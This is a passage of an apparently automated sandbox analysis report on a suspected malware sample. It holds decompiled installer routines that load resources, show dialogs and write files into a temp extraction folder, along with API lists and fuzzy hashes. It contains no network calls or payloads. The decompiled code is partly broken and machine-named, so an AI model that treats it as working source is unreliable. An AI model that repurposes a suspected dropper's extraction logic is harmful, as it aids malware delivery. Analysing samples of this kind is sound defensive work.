                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A94189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A930B4), ref: 00A941E7
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 3f5246e601051582647672233ec71b38d6120b07f73601c8a2b33254faa01e7e
                                                                                                                                                                                                        • Instruction ID: 0edb4416e5e549c10dd7bbfeaa1db75c8a22cbd8b44b71cce5e6dddb1c092763
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f5246e601051582647672233ec71b38d6120b07f73601c8a2b33254faa01e7e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA01FFF53002243BFF2427A94C86F7B21DEDBE9795F204226B706E62809EA8CC0341B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A919E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xa98004; // 0x6298f871
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00A943D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xa99a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00A96CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                        0x00a919e0
                                                                                                                                                                                                        0x00a919e0
                                                                                                                                                                                                        0x00a919eb
                                                                                                                                                                                                        0x00a919f2
                                                                                                                                                                                                        0x00a919f9
                                                                                                                                                                                                        0x00a919fc
                                                                                                                                                                                                        0x00a91a01
                                                                                                                                                                                                        0x00a91a2a
                                                                                                                                                                                                        0x00a91a2e
                                                                                                                                                                                                        0x00a91a3e
                                                                                                                                                                                                        0x00a91a4f
                                                                                                                                                                                                        0x00a91a62
                                                                                                                                                                                                        0x00a91a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91a03
                                                                                                                                                                                                        0x00a91a06
                                                                                                                                                                                                        0x00a91a20
                                                                                                                                                                                                        0x00a91a20
                                                                                                                                                                                                        0x00a91a08
                                                                                                                                                                                                        0x00a91a08
                                                                                                                                                                                                        0x00a91a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a91a16
                                                                                                                                                                                                        0x00a91a18
                                                                                                                                                                                                        0x00a91a70
                                                                                                                                                                                                        0x00a91a72
                                                                                                                                                                                                        0x00a91a72
                                                                                                                                                                                                        0x00a91a14
                                                                                                                                                                                                        0x00a91a06
                                                                                                                                                                                                        0x00a91a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A91A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A91A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00A91A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A91A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00A91A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                        • Instruction ID: 28ffb22c877db83ba57deb731e0f5f80cf3484d4beced83219d93ea509f980bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bad9e26e15d343a9c6fe89d8391c3427c133fd938cb18485e38216a3abf0e0db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6511A53170110AAFDF10EFA4DE08AAE77F8EF59340F204256F51296590DE349E02CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A963C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00A963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xa98004; // 0x6298f871
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00A91781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E00A9658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xa99124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xa99124 = 0x80070052;
					_t37 = 0;
				}
				return E00A96CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                        0x00a963cb
                                                                                                                                                                                                        0x00a963d2
                                                                                                                                                                                                        0x00a963d8
                                                                                                                                                                                                        0x00a963ea
                                                                                                                                                                                                        0x00a963f3
                                                                                                                                                                                                        0x00a96401
                                                                                                                                                                                                        0x00a96402
                                                                                                                                                                                                        0x00a96410
                                                                                                                                                                                                        0x00a96415
                                                                                                                                                                                                        0x00a96433
                                                                                                                                                                                                        0x00a96438
                                                                                                                                                                                                        0x00a96449
                                                                                                                                                                                                        0x00a96463
                                                                                                                                                                                                        0x00a9646d
                                                                                                                                                                                                        0x00a96477
                                                                                                                                                                                                        0x00a96477
                                                                                                                                                                                                        0x00a9647a
                                                                                                                                                                                                        0x00a9643a
                                                                                                                                                                                                        0x00a9643a
                                                                                                                                                                                                        0x00a96444
                                                                                                                                                                                                        0x00a96444
                                                                                                                                                                                                        0x00a96492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A9647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A963EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-2312194364
                                                                                                                                                                                                        • Opcode ID: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                        • Instruction ID: cf29f51a44b085467e32f3d7baca73cb4cc7207f1ca92b07c52387d595e137b1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721C671B00118ABDB10DFA5DC85FEB73B8EB99314F10426AB54597140DAB05D858FA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A947E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A947E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00A91680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xa991e0; // 0x31c8320
						 *(_t34 + 4) = _t11;
						 *0xa991e0 = _t34;
						return 1;
					}
					_t25 =  *0xa98584; // 0x0
					E00A944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xa98584; // 0x0
				E00A944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                        0x00a947e8
                                                                                                                                                                                                        0x00a947f0
                                                                                                                                                                                                        0x00a947f4
                                                                                                                                                                                                        0x00a9480f
                                                                                                                                                                                                        0x00a94811
                                                                                                                                                                                                        0x00a94814
                                                                                                                                                                                                        0x00a94814
                                                                                                                                                                                                        0x00a94816
                                                                                                                                                                                                        0x00a94817
                                                                                                                                                                                                        0x00a94829
                                                                                                                                                                                                        0x00a9482b
                                                                                                                                                                                                        0x00a9482f
                                                                                                                                                                                                        0x00a9484f
                                                                                                                                                                                                        0x00a94852
                                                                                                                                                                                                        0x00a94855
                                                                                                                                                                                                        0x00a94855
                                                                                                                                                                                                        0x00a94857
                                                                                                                                                                                                        0x00a94858
                                                                                                                                                                                                        0x00a94860
                                                                                                                                                                                                        0x00a94865
                                                                                                                                                                                                        0x00a9486a
                                                                                                                                                                                                        0x00a9486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94876
                                                                                                                                                                                                        0x00a94831
                                                                                                                                                                                                        0x00a94841
                                                                                                                                                                                                        0x00a94847
                                                                                                                                                                                                        0x00a9480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9480b
                                                                                                                                                                                                        0x00a947f6
                                                                                                                                                                                                        0x00a94806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A94E6F), ref: 00A947EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A94823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A94847
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A94851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-2312194364
                                                                                                                                                                                                        • Opcode ID: e85aa0bc9765a5ed172d49e119227b3f57e3e070c00e52f26703a4cbd713366d
                                                                                                                                                                                                        • Instruction ID: f16fc726ee13bcd084f308ae7f9ab3397ebb48c64eda13632b53b19eca2e8ea6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85aa0bc9765a5ed172d49e119227b3f57e3e070c00e52f26703a4cbd713366d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C2797046416FDF24DFA49C58F773BAAEBCA300F14C55AEA829B251DE358C078760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A93680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                        0x00a9368c
                                                                                                                                                                                                        0x00a9368f
                                                                                                                                                                                                        0x00a93691
                                                                                                                                                                                                        0x00a9369f
                                                                                                                                                                                                        0x00a936a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a936ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a936bc
                                                                                                                                                                                                        0x00a936bc
                                                                                                                                                                                                        0x00a936c0
                                                                                                                                                                                                        0x00a936cb
                                                                                                                                                                                                        0x00a936c2
                                                                                                                                                                                                        0x00a936c4
                                                                                                                                                                                                        0x00a936c4
                                                                                                                                                                                                        0x00a936da
                                                                                                                                                                                                        0x00a936e0
                                                                                                                                                                                                        0x00a936e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a936e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a936ba
                                                                                                                                                                                                        0x00a936ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00A936CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                        • Instruction ID: c0d51a56f3d1165de9dea7f1c77a8c37039630edeef9f7ea3022a3fab9db44f7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84016773B0025577DF308BE65C48EEB76BCEBC5B10F14021BFA15E2184D965CA45C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00A96517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xa99a3c; // 0xa90000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00A944B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                        0x00a9651f
                                                                                                                                                                                                        0x00a9652a
                                                                                                                                                                                                        0x00a96534
                                                                                                                                                                                                        0x00a9656b
                                                                                                                                                                                                        0x00a96577
                                                                                                                                                                                                        0x00a9657c
                                                                                                                                                                                                        0x00a96536
                                                                                                                                                                                                        0x00a9653e
                                                                                                                                                                                                        0x00a96542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96544
                                                                                                                                                                                                        0x00a96547
                                                                                                                                                                                                        0x00a9654c
                                                                                                                                                                                                        0x00a96549
                                                                                                                                                                                                        0x00a96549
                                                                                                                                                                                                        0x00a96549
                                                                                                                                                                                                        0x00a9655e
                                                                                                                                                                                                        0x00a96560
                                                                                                                                                                                                        0x00a96569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96569
                                                                                                                                                                                                        0x00a96542
                                                                                                                                                                                                        0x00a96587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 23ffe193f6f475f8cfcebbcb222a71e1b6bf07b968c4dbb38ec48b656e520e09
                                                                                                                                                                                                        • Instruction ID: 7fff8f9e40d0fe7e8298db93c2ab598f2212b00034e5a06050db7e4b98d57819
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23ffe193f6f475f8cfcebbcb222a71e1b6bf07b968c4dbb38ec48b656e520e09
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A012672300615BBCF109FA99C08DBB7AACEF89360F01012BFE0093150DB718C1286E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A965E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00A965E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                        0x00a965e8
                                                                                                                                                                                                        0x00a965ed
                                                                                                                                                                                                        0x00a965ef
                                                                                                                                                                                                        0x00a965f2
                                                                                                                                                                                                        0x00a965f4
                                                                                                                                                                                                        0x00a965f4
                                                                                                                                                                                                        0x00a965f6
                                                                                                                                                                                                        0x00a965f7
                                                                                                                                                                                                        0x00a96608
                                                                                                                                                                                                        0x00a96611
                                                                                                                                                                                                        0x00a96618
                                                                                                                                                                                                        0x00a9661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9660e
                                                                                                                                                                                                        0x00a96623
                                                                                                                                                                                                        0x00a96625
                                                                                                                                                                                                        0x00a9663b
                                                                                                                                                                                                        0x00a9663b
                                                                                                                                                                                                        0x00a9663d
                                                                                                                                                                                                        0x00a96641
                                                                                                                                                                                                        0x00a96610
                                                                                                                                                                                                        0x00a96610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96610
                                                                                                                                                                                                        0x00a96644
                                                                                                                                                                                                        0x00a96647
                                                                                                                                                                                                        0x00a96647
                                                                                                                                                                                                        0x00a96621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A92B33), ref: 00A96602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00A96612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00A96629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00A96635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
